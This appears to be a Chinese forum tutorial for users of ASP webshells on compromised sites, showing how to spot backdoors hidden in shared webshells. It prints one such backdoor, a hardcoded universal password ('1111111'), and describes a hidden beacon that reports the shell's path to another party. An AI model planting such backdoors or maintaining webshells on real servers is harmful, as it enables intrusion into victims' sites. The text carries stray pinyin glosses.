我等小菜自己寫(xiě)不來(lái)asp馬,只能用大蝦寫(xiě)的,但網(wǎng)上流傳的都不知道是幾手的了, 難免有些居心不良的人會(huì)在里面加后門(mén)。
好不容易拿到個(gè)shell又被別人偷走了怎么甘心啊!所以在下完asp木馬后要先檢查有沒(méi)后門(mén),通常加了后門(mén)的為了隱秘性,都會(huì)加密!所以首先我們要先解密 asp木馬解密工具解密后先檢查有無(wú)萬(wàn)能密碼,也就是說(shuō)就算你改了木馬的密碼,他也能用這個(gè)密碼來(lái)登錄
正常的:
EnD fUNCtION
IF SEssIoN("web2a2dmin")<>UsERpaSs thEn
IF requeSt.FoRM("pass")<>"" TheN
iF REquesT.foRM("pass")=uSERPASS Then
SEsSIoN("web2a2dmin")=uSERPAss
rESPOnsE.rEdirEct Url
ELse
rrs"對(duì)不起,密碼驗(yàn)證失敗!"
加有萬(wàn)能密碼的:
EnD fUNCtION
IF SEssIoN("web2a2dmin")<>UsERpaSs thEn
IF requeSt.FoRM("pass")<>"" TheN
iF REquesT.foRM("pass")=uSERPASS or request.form("pass")="1111111" Then
SEsSIoN("web2a2dmin")=uSERPAss
rESPOnsE.rEdirEct Url
ELse
rrs"對(duì)不起,密碼驗(yàn)證失敗!"
1111111就是傳說(shuō)中的萬(wàn)能密碼了。
找到萬(wàn)能密碼代碼后把or request.form("pass")="1111111" 刪除就OK了!
下面來(lái)找馬大多數(shù)都喜歡用框架掛馬:
找到后刪了,到此asp后門(mén)就算剔除了!
下面教大家后門(mén)的原理:
這是一段收信的asp代碼將其保存為1.asp
以下是引用片段: |
代碼基本意思就是:“HTTP_REFERER” 鏈接到當(dāng)前頁(yè)面的前一頁(yè)面的 URL 地址
簡(jiǎn)單來(lái)說(shuō)就是獲得webshell的地址然后記錄在bobo.txt這里文本里
上傳到空間比如 http://127.0.0.1/1.asp
以下是引用片段: |
插到asp木馬中,那么別人訪(fǎng)問(wèn)這個(gè)被掛了馬的asp木馬就會(huì)生成個(gè)bobo.txt里面就會(huì)有asp大馬的路徑了
我們學(xué)習(xí)他是為了更好的理解,大家千萬(wàn)別用來(lái)整菜鳥(niǎo)!
